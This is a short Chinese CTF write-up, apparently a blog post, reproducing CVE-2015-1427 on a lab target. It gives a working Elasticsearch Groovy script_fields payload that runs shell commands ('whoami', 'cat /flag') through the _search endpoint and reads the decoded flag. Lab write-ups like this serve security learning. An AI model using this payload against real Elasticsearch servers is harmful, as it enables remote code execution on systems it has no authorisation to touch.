春秋云境:CVE-2015-1427[漏洞复现]

查询CNNVD有关漏洞信息

从下方POC、EXP有关漏洞链接以及Github查询可得Payload:

Payload:(上方双斜杠需要换成单斜杠)

{"size":1, "script_fields": {"myscript":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\"whoami\").getText()"}}}


使用Nuclei对靶标进行漏洞扫描

可以看到爆洞URL是:

http://eci-2zeascpohsk7ptpq8lbh.cloudeci1.ichunqiu.com:9200/_search

使用Yakit构造Payload数据包

执行whoami命令,可以看到响应体末尾已经出现回显

执行cat /flag命令,可以看到回显是Base64格式

使用Yakit自带的Codec功能进行解码


flag{57c94e04-f951-4f05-b04a-dea8bf8afbe1}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0DayHP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值